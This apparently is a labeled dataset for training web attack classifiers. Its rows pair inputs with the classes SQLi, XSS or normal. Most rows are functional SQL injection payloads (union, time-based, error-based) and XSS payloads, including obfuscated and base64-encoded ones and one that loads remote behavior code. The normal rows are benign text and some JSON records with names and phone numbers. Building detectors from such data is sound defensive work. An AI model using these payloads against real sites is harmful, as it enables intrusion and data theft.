@s = 0x77616974 ...,2,SQLi,18408 "1 ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,12787 "1 ) ) as bwrg where 3254 = 3254 union all select null,null,null,null,null,null--",2,SQLi,15182 "<font ondblclick=""alert(1)"">test</font>",1,XSS,8178 "<style>@keyframes slidein {}</style><nobr style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></nobr>",1,XSS,406 "<style>@keyframes slidein {}</style><blink style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></blink>",1,XSS,386 <wbr onpointermove=alert(1)>XSS</wbr>,1,XSS,8705 <strong onpointerover=alert(1)>XSS</strong>,1,XSS,7269 -2348 ) as sige where 1639 = 1639 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,10368 1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337,2,SQLi,18041 "-4031%"" union all select 9566--",2,SQLi,20409 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27",2,SQLi,13796 -3044' ) or 4999 = 3051#,2,SQLi,21199 <nav id=x tabindex=1 onfocus=alert(1)></nav>,1,XSS,6941 <th id=x tabindex=1 onfocusin=alert(1)></th>,1,XSS,6973 1' ) ) as qpai where 2619 = 2619,2,SQLi,20333 "<base draggable=""true"" ondragstart=""alert(1)"">test</base>",1,XSS,4160 He ordered a meal from the food delivery app.,3,normal,23875 "{""id"":null,""name"":""Seadramon""}",3,normal,26946 select ( case when ( 9667 = 6212 ) then 9667 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13574 <cite onpointerout=alert(1)>XSS</cite>,1,XSS,8418 "<META HTTP-EQUIV=""Link"" Content=""<javascript:alert('XSS')>; REL=stylesheet"">",1,XSS,2195 """We are writing to officially invoke our right to insist on a vote of the select Committee on our proposal to release the transcript of the deposition with Sidney Blumenthal pursuant to the Deposition Procedures for the select Committee on the Events Surrounding the 2012 Terrorist Attack in Benghazi, which were adopted by the House and printed in the Congressional Record on May 9, 2014,"" it states.",3,normal,26452 "<style>:target {color:red;}</style><header id=x style=""transition:color 1s"" ontransitionend=alert(1)></header>",1,XSS,1017 "<table oncut=""alert(1)"" contenteditable>test</table>",1,XSS,5126 I want to choose a color for the walls.,3,normal,23844 I'm thinking of where to have a family picnic.,3,normal,23835 "The majority of infant adoptions involve the birth parents, who often select the adoptive parents for their child through either a review of a portfolio, a face-to-face meeting between the two parties, or both.",3,normal,25417 "1%"" ) ) ) or sleep ( 5 ) and ( ( ( ""%"" = """,2,SQLi,19279 "<a target=""x"" href=""xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>",1,XSS,11 "-2612"" ) as iwfj where 3231 = 3231 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --",2,SQLi,10160 """,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,18246 <custom tags onpointerleave=alert(1)>XSS</custom tags>,1,XSS,4806 "1 ) ) as huxq where 7451 = 7451 union all select null,null,null--",2,SQLi,16663 Check data where errors occur.,3,normal,23452 "&lt;IMG SRC=\""javascript&#058;alert('XSS');\""&gt;",1,XSS,5715 "1%"" ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ""%"" = """,2,SQLi,12701 "-5826"" ) ) union all select 7192,7192#",2,SQLi,19732 Select the perfect present for the occasion.,3,normal,24140 "<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>",1,XSS,1583 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#",2,SQLi,17332 <form><input formaction=javascript:alert(1) type=image src=SOURCE>,1,XSS,2781 Select the perfect song.,3,normal,24317 Create a stunning painting.,3,normal,22558 select ( case when ( 3716 = 4021 ) then 3716 else 3716* ( select 3716 from information_schema.character_sets ) end ) #,2,SQLi,13240 `'><script>\xEF\xBF\xBEjavascript:alert(1)</script>,1,XSS,5322 <IMG SRC=`javascript:javascript:alert(1)`>,1,XSS,7315 Where's the bridge?,3,normal,23528 1' ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( ( 'jrpk' = 'jrpk,2,SQLi,14861 "<section oncontextmenu=""alert(1)"">test</section>",1,XSS,6044 """) or benchmark(10000000,MD5(1))#",2,SQLi,20183 "<rb onbeforepaste=""alert(1)"" contenteditable>test</rb>",1,XSS,4837 "<blockquote onmouseleave=""alert(1)"">test</blockquote>",1,XSS,4966 "<style>:target {transform: rotate(180deg);}</style><fieldset id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></fieldset>",1,XSS,541 <tbody onpointerenter=alert(1)>XSS</tbody>,1,XSS,7486 "select pg_sleep ( 5 ) and ( ( ""qani"" = ""qani",2,SQLi,19153 "<button onkeypress=""alert(1)"" contenteditable>test</button>",1,XSS,3721 unknown,3,normal,23245 "1, ( select ( case when ( 1570 = 1570 ) then ( select 1570 from pg_sleep ( 5 ) ) else 1/ ( select 0 ) end ) )",2,SQLi,13683 <b onpointerdown=alert(1)>XSS</b>,1,XSS,9340 "end and ( ""nuix"" like ""nuix",2,SQLi,20881 "<style>:target {transform: rotate(180deg);}</style><kbd id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></kbd>",1,XSS,669 Select the appropriate time for the meeting.,3,normal,24001 Select your think.,3,normal,24975 1' ) ) and 7230 = 2517,2,SQLi,21478 "1"" ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( ""lmjg"" like ""lmjg",2,SQLi,11047 "1"" and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ""krtr"" like ""krtr",2,SQLi,10999 "<div draggable=""true"" contenteditable>drag me</div><kbd ondrop=alert(1) contenteditable>drop here</kbd>",1,XSS,1355 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and 'nkte' = 'nkte",2,SQLi,13347 <applet onpointerover=alert(1)>XSS</applet>,1,XSS,7117 Select lounge.,3,normal,24546 <sup onpointerdown=alert(1)>XSS</sup>,1,XSS,8665 1' ) ) or sleep ( 5 ) and ( ( 'taaj' = 'taaj,2,SQLi,19111 "<legend onbeforecopy=""alert(1)"" contenteditable>test</legend>",1,XSS,3332 <svg><acronym onload=alert(1)></acronym>,1,XSS,8056 "-7258 or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11853 <body onbeforeprint=alert(1)>,1,XSS,9591 -1579%' ) ) ) union all select 7272#,2,SQLi,19992 "{""id"":null,""firstName"":""Su"",""lastName"":""Krishnan"",""address"":""111 North Bridge Road #05-32 Peninsula Plaza"",""city"":""512"",""telephone"":""4851559743""}",3,normal,26874 "<map draggable=""true"" ondrag=""alert(1)"">test</map>",1,XSS,5647 1'|| ( select 'lnhq' where 7526 = 7526,2,SQLi,19784 -6405%' ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( '%' = ',2,SQLi,17664 <datalist onpointermove=alert(1)>XSS</datalist>,1,XSS,6192 "-1915%"" ) ) union all select 7732,7732,7732,7732,7732,7732,7732,7732,7732#",2,SQLi,15785 "1 ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( 9542 = 9542",2,SQLi,11728 "1' ) ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ( 'pufu' like 'pufu",2,SQLi,13867 "My short film, ""Amalia,"" became an official selection at Cannes Select.",3,normal,25876 1' where 2673 = 2673,2,SQLi,21763 "1"" and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ""jcgh"" = ""jcgh",2,SQLi,11027 "1%"" ) ) union all select null#",2,SQLi,20585 <kbd id=x tabindex=1 onbeforeactivate=alert(1)></kbd>,1,XSS,4912 <svg><animatetransform onrepeat=alert(1) attributeName=transform repeatCount=2 dur=1s>,1,XSS,1854 Filter the spam filters.,3,normal,22742 "1"" or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ""vwep"" like ""vwep",2,SQLi,12996 "{""id"":null,""name"":""drawn instead""}",3,normal,27425 "<?a foo=x=`y><img alt=""`><img src=xx:x onerror=alert(3)//"">//[""'`-->]]>]</div>",1,XSS,2107 "-6334' ) union all select 3738,3738,3738,3738,3738,3738,3738,3738--",2,SQLi,16541 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( 'cxjp' = 'cxjp",2,SQLi,13452 "<rt draggable=""true"" ondragleave=""alert(1)"">test</rt>",1,XSS,5031 "select * from users where id = 1 or "",,"" = 1 or 1 = 1 -- 1",2,SQLi,17336 "<style>:target {color: red;}</style><nextid id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></nextid>",1,XSS,825 Select a book for your entertainment.,3,normal,24002 "<style>@keyframes x{}</style><audio style=""animation-name:x"" onanimationstart=""alert(1)""></audio>",1,XSS,1533 "<style>:target {color:red;}</style><body id=x style=""transition:color 1s"" ontransitionend=alert(1)></body>",1,XSS,1216 [ ](https://a.de?p=[[/data-x=. style=background-color:#000000;z-index:999;width:100%;position:fixed;top:0;left:0;right:0;bottom:0; data-y=.]]),1,XSS,506 "-7963'+ ( select 'kxzh' where 7039 = 7039 union all select 7039,7039,7039,7039,7039,7039--",2,SQLi,14707 "-1772 ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 8904 = 8904",2,SQLi,10212 "<img \x39src=x onerror=""javascript:alert(1)"">",1,XSS,6533 "1%' or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,19480 "1' ) ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( ( 'nets' like 'nets",2,SQLi,10174 <image src/onerror=prompt(8)>,1,XSS,9579 Take 30 percent off select styles with code: PRES30. Asos,3,normal,25514 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ( ""dqou"" like ""dqou",2,SQLi,13140 "You have to click on the ""..."" menu, then select apps, and then select the Store option in the middle of the navigation bar.",3,normal,25073 Update feed.,3,normal,23045 "Scroll down a bit until you see ""FaceTime"" and select it.",3,normal,25706 "<spacer draggable=""true"" ondragend=""alert(1)"">test</spacer>",1,XSS,3711 "{""id"":null,""name"":""American Bulldog""}",3,normal,27064 )) or sleep(__TIME__)=',2,SQLi,21264 "<bdo onbeforecut=""alert(1)"" contenteditable>test</bdo>",1,XSS,4750 """ ) ) or ( ( ""x"" ) ) = ( ( ""x",2,SQLi,20679 "1%' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and '%' = '",2,SQLi,11738 "1"" ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ""ubvd"" = ""ubvd",2,SQLi,15509 "{""id"":null,""name"":""Quilladin""}",3,normal,27459 "There will be extended hours on select dates, including Sunday, Jan.",3,normal,25331 -5147 or ( 8459 = 8459 ) *4906,2,SQLi,20596 "`""'><img src=xxx:x \x27onerror=javascript:alert(1)>",1,XSS,5303 "UNION SELECT @@VERSION,SLEEP(5),USER(),4#",2,SQLi,19331 "<applet onmouseleave=""alert(1)"">test</applet>",1,XSS,6591 "><script+src=https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)""></script>",1,XSS,1812 1'+ ( select 'vddk' where 6961 = 6961,2,SQLi,19894 I'm thinking of where to have a quiet getaway.,3,normal,23845 """""><script language=""JavaScript""> alert('X \nS \nS');</script>",1,XSS,3143 """The Republicans call it the House Select Investigative Panel to Protect Infant Lives, but we call it the House Select Investigative Panel to Hurt Women's Health,"" Schakowsky tells Broadly over the phone.",3,normal,26455 Pilot programs involving select users have been underway for several years.,3,normal,25780 "<div draggable=""true"" contenteditable>drag me</div><p ondragover=alert(1) contenteditable>drop here</p>",1,XSS,1326 <menuitem id=x tabindex=1 onfocusin=alert(1)></menuitem>,1,XSS,4314 <tfoot onpointerenter=alert(1)>XSS</tfoot>,1,XSS,7497 Why else would he want to select the trail she followed - even the clothes she wore?,3,normal,25128 "But the two others are almost (if now not quite) peculiar to the United States, viz, to select candidates for office and to procure places of emolument for party workers.",3,normal,26308 "<rtc ondblclick=""alert(1)"">test</rtc>",1,XSS,8694 "{""id"":null,""firstName"":""Cherie"",""lastName"":""Draws"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26950 "seriously seriously are realizing league of legends is a TEAMGAME and also starts in champ selection, even after SoloQueue... Talking about the hovered picks and teamcomps is not toxic, and uncalled for is not stupid, simply you cant say ""let him play and Michael wants or die"" cuz thats stupid",3,normal,26485 \\'); alert(\'xss\');var x=\',1,XSS,9583 1' ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ),2,SQLi,13831 1 where 1015 = 1015,2,SQLi,21956 Select a comfortable chair.,3,normal,22598 "1%"" ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",2,SQLi,17948 "On the other hand, if local elections are held on the "" off "" or odd year, and there be no national or state candidates, the voter feels much more free to select only those candidates whom he considers best qualified for the various offices.",3,normal,25843 "1%' ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,19089 "{""id"":null,""firstName"":""Daryl"",""lastName"":""Yeo"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27463 "<ol oncut=""alert(1)"" contenteditable>test</ol>",1,XSS,6315 "select * from users where id = 1 or ""@ ( "" or 1 = 1 -- 1",2,SQLi,17599 select ( case when ( 1868 = 5071 ) then 1 else 1868* ( select 1868 from master..sysdatabases ) end ) --,2,SQLi,13988 1 ) where 1120 = 1120,2,SQLi,21708 "<style>@keyframes x{}</style><table style=""animation-name:x"" onanimationstart=""alert(1)""></table>",1,XSS,1544 "1%"" ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ""%"" = """,2,SQLi,11517 "1' in boolean mode ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11540 "`""><\x00script>javascript:alert(1)</script>",1,XSS,7059 <output onfocusout=alert(1) tabindex=1 id=x></output><input autofocus>,1,XSS,2541 "-9978"" or make_set ( 4893 = 9765,9765 ) and ""mhjt"" = ""mhjt",2,SQLi,17361 Where's the therapist's office?,3,normal,23667 "select * from users where id = '1' + @ ( 1 ) union select 1,version ( ) -- 1'",2,SQLi,15392 <optgroup onpointerup=alert(1)>XSS</optgroup>,1,XSS,6734 "><script>alert(String.fromCharCode(88,83,83))</script>",1,XSS,4848 "<script onmousemove=""alert(1)"">test</script>",1,XSS,6804 Select options wisely.,3,normal,24436 <textarea onbeforecopy=alert(1) autofocus>XSS</textarea>,1,XSS,4332 <em onpointerenter=alert(1)>XSS</em>,1,XSS,8927 "<img src onerror /"" '""= alt=javascript:alert(1)//"">",1,XSS,5336 I need to select the right colors for my artwork.,3,normal,23756 <script> alert(asdal'') </script>,1,XSS,9351 "<header oncut=""alert(1)"" contenteditable>test</header>",1,XSS,4731 Select the perfect wine for the occasion.,3,normal,22967 "1' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 'adjc' = 'adjc",2,SQLi,11198 "admin"") or ""1""=""1""--",2,SQLi,21720 "admin"" or ""1"" = ""1""--",2,SQLi,21576 Select your favorite dish.,3,normal,24286 "-7255' union all select 2127,2127,2127,2127,2127#",2,SQLi,18564 "<style>:target {color: red;}</style><dfn id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></dfn>",1,XSS,1064 "<style>:target {color: red;}</style><rp id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></rp>",1,XSS,1169 -3881 ) ) ) union all select 4438--,2,SQLi,20044 "<style ondblclick=""alert(1)"">test</style>",1,XSS,7654 -7984' order by 1--,2,SQLi,22003 "1'|| ( select 'lstx' from dual where 2972 = 2972 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) ) ||'",2,SQLi,11154 Where's the salon?,3,normal,23618 <button onblur=alert(1) id=x></button><input autofocus>,1,XSS,4493 Where's the best spot to do some birdwatching?,3,normal,23692 "1"" ) ) and 2006 = 2006",2,SQLi,21395 "<audio onclick=""alert(1)"">test</audio>",1,XSS,8338 <meter id=x tabindex=1 onactivate=alert(1)></meter>,1,XSS,5488 "1%"" ) and sleep ( 5 ) #",2,SQLi,21361 1' ) where 1645 = 1645 rlike sleep ( 5 ) --,2,SQLi,19190 "OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))",2,SQLi,17125 "“I do think that being able to select different people could help,” she said.",3,normal,26447 <colgroup onblur=alert(1) tabindex=1 id=x></colgroup><input autofocus>,1,XSS,2504 "<big onbeforepaste=""alert(1)"" contenteditable>test</big>",1,XSS,4362 "<SPAN DATASRC=""#"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>",1,XSS,4173 Select beverage.,3,normal,24508 "{""id"":null,""firstName"":""Milky"",""lastName"":""Teo"",""address"":""1207 NETWORK CENTRE DR, EFFINGHAM IL 62401"",""city"":""316"",""telephone"":""870815848""}",3,normal,27299 "-3074' ) ) union all select 6131,6131,6131,6131,6131,6131,6131--",2,SQLi,16803 select ( case when ( 8808 = 1367 ) then 1 else 8808* ( select 8808 from master..sysdatabases ) end ) --,2,SQLi,13947 "1' ) where 6274 = 6274 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14536 <input4 onpointerover=alert(1)>XSS</input4>,1,XSS,7189 "<style>:target {transform: rotate(180deg);}</style><ol id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></ol>",1,XSS,700 waitfor delay '0:0:5'# ogzq,2,SQLi,20905 "-9764' where 1266 = 1266 or elt ( 4069 = 6162,6162 ) --",2,SQLi,17773 "{""id"":null,""name"":""son""}",3,normal,26984 "1%"" ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ""%"" = """,2,SQLi,14215 "<rt onmousemove=""alert(1)"">test</rt>",1,XSS,8790 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--",2,SQLi,14421 "1'|| ( select 'gikt' where 8447 = 8447 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12168 "1 ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,13608 "a' or 1 = 1,",2,SQLi,22335 "admin"" ) or ""1"" = ""1""#",2,SQLi,21383 <label onblur=alert(1) tabindex=1 id=x></label><input autofocus>,1,XSS,2916 1'+ ( select 'nlvq' where 7528 = 7528 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,14576 "1"" ) as xylo where 2112 = 2112 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10542 "<dfn onpaste=""alert(1)"" contenteditable>test</dfn>",1,XSS,5646 "1"" ) ) union all select null,null#",2,SQLi,20174 "<IMG SRC=x ondragend=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3442 "1 ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12067 <input2 onpointerout=alert(1)>XSS</input2>,1,XSS,7360 coerce,3,normal,23232 "But if you're buying flowers online, all you need to do is select an occasion, look at some pictures, then select a type, number of flowers, a vase and write a personal message.",3,normal,26315 <applet id=x tabindex=1 ondeactivate=alert(1)></applet><input id=y autofocus>,1,XSS,2145 "<ul onbeforecut=""alert(1)"" contenteditable>test</ul>",1,XSS,5106 "<script>throw onerror=eval,'alert\x281\x29'</script>",1,XSS,5075 "-8833' ) ) union all select 3227,3227,3227,3227,3227--",2,SQLi,17979 1 ) ) as ipfy where 1189 = 1189,2,SQLi,20488 1 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ),2,SQLi,17530 "1'+ ( select 'qzcx' where 9524 = 9524 and elt ( 3069 = 8430,8430 ) ) +'",2,SQLi,16072 1%' ) ) ) and 7219 = 7361 and ( ( ( '%' = ',2,SQLi,19194 1' ) rlike ( select ( case when ( 9308 = 2540 ) then 1 else 0x28 end ) ) and ( 'rghd' = 'rghd,2,SQLi,14551 <video onfullscreenchange=alert(1) src=validvideo.mp4 controls>,1,XSS,2969 select * from users where id = 1 or 1 = 1 -- 1,2,SQLi,18912 "<textarea onmousedown=""alert(1)"">test</textarea>",1,XSS,5990 "1"" ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ""lsca"" like ""lsca",2,SQLi,11681 Thus the filter object can be used to select a subset of the symbols provided by the object name.,3,normal,25293 Where's the carnival?,3,normal,23590 "<style>:target {transform: rotate(180deg);}</style><a id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></a>",1,XSS,730 <button onSelectStart=javascript:alert(1)>,1,XSS,7590 "<tfoot onmousemove=""alert(1)"">test</tfoot>",1,XSS,7546 "<style>@keyframes slidein {}</style><data style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></data>",1,XSS,414 "1"" ) as rgbz where 6687 = 6687 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11362 "Go to the Games & Apps menu, and then select ""Games.""3.",3,normal,26143 "<colgroup onmouseenter=""alert(1)"">test</colgroup>",1,XSS,5747 Select a skincare product to try.,3,normal,24094 1' AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND '1337'='1337,2,SQLi,17233 "<;XSS STYLE="";behavior: url(http://ha.ckers.org/xss.htc);"";>;",1,XSS,3269 ;waitfor delay '0:0:__TIME__'--,2,SQLi,20383 <svg><tfoot onload=alert(1)></tfoot>,1,XSS,8811 Select impress.,3,normal,24732 <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;,1,XSS,419 "1'+ ( select 'myrb' where 3622 = 3622 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) ) +'",2,SQLi,11285 \u{61}lert(1),1,XSS,9820 "1 where 6408 = 6408 union all select null,null,null,null,null,null,null,null--",2,SQLi,15329 "-1975"" union all select 8638,8638,8638,8638,8638,8638,8638,8638,8638#",2,SQLi,16305 password,3,normal,23174 The pressure on a select group of senators will be extreme.,3,normal,25394 <hgroup id=x tabindex=1 onbeforedeactivate=alert(1)></hgroup><input autofocus>,1,XSS,2084 The struggle was thus renewed on the old ground of the kings right to select his ministers.,3,normal,25372 "1' and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12185 "<footer draggable=""true"" ondragleave=""alert(1)"">test</footer>",1,XSS,3375 "<bdo oncopy=""alert(1)"" contenteditable>test</bdo>",1,XSS,5728 "RLIKE SLEEP(5) AND 1337""=""1337",2,SQLi,20517 "1' ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( 'adnz' = 'adnz",2,SQLi,10660 "UNION ALL SELECT 1,2,3,4,5--",2,SQLi,20792 Select a fitness class to join.,3,normal,24149 "-8490 ) ) union all select 6910,6910,6910,6910,6910,6910#",2,SQLi,17474 "<summary draggable=""true"" ondrag=""alert(1)"">test</summary>",1,XSS,3915 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ""snwx"" like ""snwx",2,SQLi,13503 "<dfn draggable=""true"" ondrag=""alert(1)"">test</dfn>",1,XSS,5538 <meter onpointerout=alert(1)>XSS</meter>,1,XSS,8005 "<dd onkeypress=""alert(1)"" contenteditable>test</dd>",1,XSS,5389 and 'one'='one–,2,SQLi,22148 "<optgroup onbeforepaste=""alert(1)"" contenteditable>test</optgroup>",1,XSS,2740 `'><script>\xE2\x80\x83javascript:alert(527)</script>,1,XSS,5054 &lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;,1,XSS,4002 "First, download the YouTube Gaming app from the Play Store, select the broadcast button, and select your preferred stream quality (720p HD or 480p).",3,normal,26195 "<a href=""\x1Ajavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2429 "1'+ ( select 'usoq' where 7783 = 7783 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) ) +'",2,SQLi,11962 <input3 onpointerenter=alert(1)>XSS</input3>,1,XSS,6836 "{""id"":null,""firstName"":""Lai Peng"",""lastName"":""Leong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26790 "1 ) where 2720 = 2720 and elt ( 4249 = 4249,7259 ) --",2,SQLi,18095 "<style>:target {color:red;}</style><template id=x style=""transition:color 1s"" ontransitionend=alert(1)></template>",1,XSS,853 Update the software package.,3,normal,22729 